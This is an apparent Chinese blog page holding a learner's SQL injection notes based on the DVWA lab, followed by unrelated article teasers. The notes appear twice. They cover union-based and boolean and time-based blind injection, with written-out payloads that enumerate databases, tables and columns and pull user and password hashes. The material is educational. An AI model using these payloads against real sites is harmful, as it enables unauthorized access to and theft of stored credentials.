SQL注入思路1判断是字符型还是数字型确定是否需要闭合单引号’2判断字段数 为后续联合查询确定字段数防止出现语法错误3联合查询 union select判断回显位置 1 union select 1,2查询当前的数据库名操作当前数据库的用户名查询数据库的版本操作系统确定下一步的操作因为不同数据库版本和操作系统的语法和注入方式不同4获取表名用于猜测敏感数据来源于那张表MySQL数据的自带表information_schema.tables里面的所有表名5获取表中的字段名6获取表中的敏感数据额外知识点information_schema.tables 完整写法数据库名.表名表示在 information_schema 数据库中的 tables 表。在测试注入点是字符还是数字型时注入1abcd输出正常结果是因为在代码中确定了参数的类型比如int id这样abcd就会被截断在查information_schema.tables表中的数据时在联合查询两边极易出现排序规则不相同从而报错可以在查询的字段中使用HEX字段名进行16进制编码解决但最后需要进行解码各大主流数据库MySQL、SQL Server、PostgreSQL、Oracle都遵循这一原则但它们的判断严格程度却各有不同MD5 是一种常见的哈希算法用于将任意长度的数据转换为固定长度的 32 位十六进制字符串。在 DVWA 中用户的密码通常以 MD5 形式存储在数据库中。用于加密order by后面除了跟字段名还可以跟数字确定字段数header() 主要就是用来发送两类信息状态码比如 200 OK、404 Not Found、500 Internal Server Error→ 告诉浏览器“这次请求的结果是什么状态”。头部字段比如 Content-Type: text/html、Location:https://...→ 告诉浏览器“返回的内容是什么格式”、“要不要跳转”、“怎么缓存”等。md5的编解码网址md5在线解密破解,md5解密加密盲注主要是没有回显的数据只能靠猜测数据的长度每个位对应的ASCII的值从而猜出数据1判断是字符还是数字类型2猜解当前的数据库名称1 and length(database())1 and ascii(substr(database(),1,1))在 SQL 中SUBSTR(string, start, length) 函数的作用是从字符串中截取一段。第一个1是从第几个字母开始第二个1是往后取几个字母3猜解当前数据库中表的数量1 and (select count(table_name) from information_schema.tables where table_schemadatabase())4猜解表名称的长度1.查询列出当前连接数据库下的所有表名称select table_name from information_schema.tables where table_schemadatabase()#2.列出当前连接数据库中的第1个表名称select table_name from information_schema.tables where table_schemadatabase() limit 0,1#3.以当前连接数据库第1个表的名称作为字符串从该字符串的第一个字符开始截取其全部字符所以不用写lengthsubstr((select table_name from information_schema.tables where table_schemadatabase() limit 0,1),1) #4.计算所截取当前连接数据库第1个表名称作为字符串的长度值length(substr((select table_name from information_schema.tables where table_schemadatabase() limit 0,1),1))#5.将当前连接数据库第1个表名称长度与某个值比较作为判断条件联合and逻辑构造特定的sql语句进行查询根据查询返回结果猜解表名称的长度值1 and length(substr((select table_name from information_schema.tables where table_schemadatabase() limit 0,1),1))5表名称的字符组成1 and ascii(substr((select table_name from information_schema.tables where table_schemadatabase() limit 0,1),1,1))6猜解表中的字段名1 and (select count(column_name) from information_schema.columns where table_schemadatabase() and table_nameusers)1 and length(substr((select column_name from information_schema.columns where table_name users limit 0,1),1))1’ and (select count( * ) from information_schema.columns where table_schemadatabase() and table_name’users’ and column_name’user’) 1’ and (select count( * ) from information_schema.columns where table_schemadatabase() and table_name’users’ and column_name’password’)常见情况其他数据就需要猜每个字段名的每一个字母用户名user/username/uname/u_name/name/…密码password/pass_word/pwd/pass/…7获取表中的字段值(数据)1 and length(substr((select user from users limit 0,1),1))1 and ascii(substr((select user from users limit 0,1),1,1))XXX #如果等于32位可能是MD5加密很难猜出来时间的盲注把布尔盲注的语句插入if(expr1,expr2,expr3)函数中的expr1如果 expr1 是真 则 if()的返回值为expr2; 否则返回值则为 expr3。if() 的返回值为数字值或字符串值if语句sleep1即语句为真就延时否则不延时补充我感觉不用查出数据库的名称后续直接用database()就行
入门SQL注入的笔记与思考
发布时间:2026/6/25 14:24:54
SQL注入思路1判断是字符型还是数字型确定是否需要闭合单引号’2判断字段数 为后续联合查询确定字段数防止出现语法错误3联合查询 union select判断回显位置 1 union select 1,2查询当前的数据库名操作当前数据库的用户名查询数据库的版本操作系统确定下一步的操作因为不同数据库版本和操作系统的语法和注入方式不同4获取表名用于猜测敏感数据来源于那张表MySQL数据的自带表information_schema.tables里面的所有表名5获取表中的字段名6获取表中的敏感数据额外知识点information_schema.tables 完整写法数据库名.表名表示在 information_schema 数据库中的 tables 表。在测试注入点是字符还是数字型时注入1abcd输出正常结果是因为在代码中确定了参数的类型比如int id这样abcd就会被截断在查information_schema.tables表中的数据时在联合查询两边极易出现排序规则不相同从而报错可以在查询的字段中使用HEX字段名进行16进制编码解决但最后需要进行解码各大主流数据库MySQL、SQL Server、PostgreSQL、Oracle都遵循这一原则但它们的判断严格程度却各有不同MD5 是一种常见的哈希算法用于将任意长度的数据转换为固定长度的 32 位十六进制字符串。在 DVWA 中用户的密码通常以 MD5 形式存储在数据库中。用于加密order by后面除了跟字段名还可以跟数字确定字段数header() 主要就是用来发送两类信息状态码比如 200 OK、404 Not Found、500 Internal Server Error→ 告诉浏览器“这次请求的结果是什么状态”。头部字段比如 Content-Type: text/html、Location:https://...→ 告诉浏览器“返回的内容是什么格式”、“要不要跳转”、“怎么缓存”等。md5的编解码网址md5在线解密破解,md5解密加密盲注主要是没有回显的数据只能靠猜测数据的长度每个位对应的ASCII的值从而猜出数据1判断是字符还是数字类型2猜解当前的数据库名称1 and length(database())1 and ascii(substr(database(),1,1))在 SQL 中SUBSTR(string, start, length) 函数的作用是从字符串中截取一段。第一个1是从第几个字母开始第二个1是往后取几个字母3猜解当前数据库中表的数量1 and (select count(table_name) from information_schema.tables where table_schemadatabase())4猜解表名称的长度1.查询列出当前连接数据库下的所有表名称select table_name from information_schema.tables where table_schemadatabase()#2.列出当前连接数据库中的第1个表名称select table_name from information_schema.tables where table_schemadatabase() limit 0,1#3.以当前连接数据库第1个表的名称作为字符串从该字符串的第一个字符开始截取其全部字符所以不用写lengthsubstr((select table_name from information_schema.tables where table_schemadatabase() limit 0,1),1) #4.计算所截取当前连接数据库第1个表名称作为字符串的长度值length(substr((select table_name from information_schema.tables where table_schemadatabase() limit 0,1),1))#5.将当前连接数据库第1个表名称长度与某个值比较作为判断条件联合and逻辑构造特定的sql语句进行查询根据查询返回结果猜解表名称的长度值1 and length(substr((select table_name from information_schema.tables where table_schemadatabase() limit 0,1),1))5表名称的字符组成1 and ascii(substr((select table_name from information_schema.tables where table_schemadatabase() limit 0,1),1,1))6猜解表中的字段名1 and (select count(column_name) from information_schema.columns where table_schemadatabase() and table_nameusers)1 and length(substr((select column_name from information_schema.columns where table_name users limit 0,1),1))1’ and (select count( * ) from information_schema.columns where table_schemadatabase() and table_name’users’ and column_name’user’) 1’ and (select count( * ) from information_schema.columns where table_schemadatabase() and table_name’users’ and column_name’password’)常见情况其他数据就需要猜每个字段名的每一个字母用户名user/username/uname/u_name/name/…密码password/pass_word/pwd/pass/…7获取表中的字段值(数据)1 and length(substr((select user from users limit 0,1),1))1 and ascii(substr((select user from users limit 0,1),1,1))XXX #如果等于32位可能是MD5加密很难猜出来时间的盲注把布尔盲注的语句插入if(expr1,expr2,expr3)函数中的expr1如果 expr1 是真 则 if()的返回值为expr2; 否则返回值则为 expr3。if() 的返回值为数字值或字符串值if语句sleep1即语句为真就延时否则不延时补充我感觉不用查出数据库的名称后续直接用database()就行
相关文章
YOLOv11 改进 - SPPF模块 发论文神器!LSKA注意力改进SPPF,增强多尺度特征提取能力,高效涨点!!!
前言 本文介绍了Large Separable Kernel Attention (LSKA)模块及其在YOLOv11中的结合应用。LSKA旨在解决Visual Attention Networks (VAN)使用大内核卷积时的计算效率问题,通过将2D深度卷积层的卷积核分解为级联的水平和垂直1-D卷积核,降低了计算复杂度…
生产主管压力大想转行怎么办
你是否每天被生产指标、人员管理、突发故障和成本控制压得喘不过气?作为生产主管,你就像一座工厂的“中枢神经”,时刻紧绷,责任重大。长期的高压环境让人身心俱疲,产生转行的念头,是再正常不过的职业思考。…
PCB信号线阻抗介绍
PCB信号线阻抗介绍PCB信号线阻抗,全称传输线特性阻抗,是高速电路设计的核心参数,区别于普通直流电阻。它是高频信号在PCB走线传输时,感受到的电压与电流的稳定比值,由走线的电磁场传输特性决定,和导线发热损…
WebSocket 详解
WebSocket 详解 一、什么是 WebSocket? 核心特性 二、WebSocket 的工作原理 2.1 握手过程 2.2 数据帧格式 三、WebSocket 与 HTTP 的对比 四、WebSocket 的应用场景 4.1 实时聊天应用 4.2 在线游戏 4.3 金融交易 4.4 物联网(IoT) 4.5 协作工具 五、WebSocket 的优缺点 优点 …
懂机芯的老板如何一眼看穿卡地亚坦克与真力时El Primero的工业底牌
修理台上这套机芯结构,一眼就能看出设计上的各种妥协。在瑞士表厂研发机芯那些年,我最怕看到这种金玉其外的情况。今天咱们不讲那些虚头巴脑的营销故事,只看最真实的机械逻辑,带你避开那些隐形成本。 拆开卡莱拉CH 80的后盖&…
腾讯 AI 助手 Marvis 登陆 App Store 全量覆盖,多模式与特色功能提升效率保护隐私
Marvis 移动端上线,完成全平台覆盖腾讯旗下操作系统层级 AI 助手 Marvis(马维斯)宣布其移动端 APP iOS 版本正式上线苹果 App Store,至此完成了移动端和 PC 端的全量覆盖。Marvis 自 2026 年 5 月 20 日面世后,已累计交…
SSH 隧道实用指南:本地与远程端口转发全解析,助你成隧道高手!
目录- 本地端口转发- 使用堡垒主机进行本地端口转发- 远程端口转发- 向家庭或私有网络进行远程端口转发- 动态本地端口转发- 动态远程端口转发- 总结- 实践- 参考资源本文以清晰直观的方式解释了 SSH 端口转发,介绍了如何使用本地和远程端口转发,以及可能…
计算机毕业设计之“明丽书屋”图书管理系统
网络的广泛应用给生活带来了十分的便利。所以把“明丽书屋”图书管理与现在网络相结合,利用JSP技术建设“明丽书屋”图书管理系统,实现“明丽书屋”图书管理系统的信息化。则对于进一步提高明丽书屋的发展,丰富“明丽书屋”图书管理经验能起到…
Lodash原型链污染漏洞实战验证:从原理到AWVS报告深度解析
1. 项目概述:从“知道”到“验证”的跨越在安全测试的日常工作中,我们经常会遇到扫描器(比如AWVS)报出各种漏洞。其中,像“Lodash原型链污染漏洞”这类依赖库的漏洞,报告上往往只有一个冷冰冰的CVE编号和风…
面试辅助工具横评:我试了5款AI面试工具,最后留下了OfferGo
上半年跳槽,面了十几家公司。说句实话,不是能力不行,是面试现场太容易崩了。 明明准备了一周,面试官换个问法脑子就一片白。面完之后那个懊悔——其实我会的。 后来开始试市面上的AI面试辅助工具。前前后后装了5款,踩…
MC-037 | 自定义 Skill 开发:创建你的AI能力模块
MONKEYCODE 教程系列 MonkeyCode教程及推广系列 MC-037 自定义 Skill 开发:创建你的AI能力模块 >官网链接注册更放心哦https://monkeycode-ai.com/?ic019e0aed-c823-783c-b08a-4f030f891e4e 系列: 不爱土豆唯爱马铃薯 MonkeyCode 教程系列 字数: 约 1400 字…
PEER模型:多模型协作范式的工程化实践指南
1. 项目概述:这不是又一个大模型,而是一次协作范式的重构 “META’s PEER: A Collaborative Language Model”这个标题里藏着一个被多数人忽略的关键词—— Collaborative (协作)。它不是在说“模型更大了”“参数更多了”“训练…
Google AI Studio 300美元额度的真相与实战指南
1. 这300美金不是“送钱”,而是Google埋下的第一道技术门槛 你看到标题里那个醒目的“$300美金”时,第一反应可能是:又一个免费额度?领完就完事?我亲手试过——这300美金根本不是红包,而是一张入场券&…
PDF对比终极指南:用diff-pdf轻松识别文档差异的完整教程
PDF对比终极指南:用diff-pdf轻松识别文档差异的完整教程 【免费下载链接】diff-pdf A simple tool for visually comparing two PDF files 项目地址: https://gitcode.com/gh_mirrors/di/diff-pdf 还在为PDF文档的版本对比而烦恼吗?diff-pdf这款开…
嵌入式GUI控件实战:ROTARY、SCROLLBAR、SLIDER原理与应用
1. 嵌入式GUI控件:从原理到实战的深度解析在嵌入式系统开发中,图形用户界面(GUI)的设计与实现往往是项目从“能用”到“好用”的关键一跃。不同于资源充沛的PC或移动平台,嵌入式设备的GUI需要在有限的CPU性能、内存空间…
Zotero Duplicates Merger:5步彻底清理文献库重复条目
Zotero Duplicates Merger:5步彻底清理文献库重复条目 【免费下载链接】ZoteroDuplicatesMerger A zotero plugin to automatically merge duplicate items 项目地址: https://gitcode.com/gh_mirrors/zo/ZoteroDuplicatesMerger 还在为文献库中堆积如山的重…
利用随机有限集理论对蜂群的ILQR和MPC控制研究附Matlab代码
✅作者简介:热爱科研的Matlab仿真开发者,擅长数据处理、建模仿真、程序设计、完整代码获取、论文复现及科研仿真。🍎 往期回顾关注个人主页:Matlab科研工作室🍊个人信条:格物致知,完整Matlab代码及仿真咨询…
为什么你的Gemini邮件CTE低于行业均值2.8倍?:从Prompt架构到发送时序的深度归因
更多请点击: https://intelliparadigm.com 第一章:为什么你的Gemini邮件CTE低于行业均值2.8倍?:从Prompt架构到发送时序的深度归因 Gemini邮件的客户转化效率(CTE)显著偏低,根本原因常被误判为…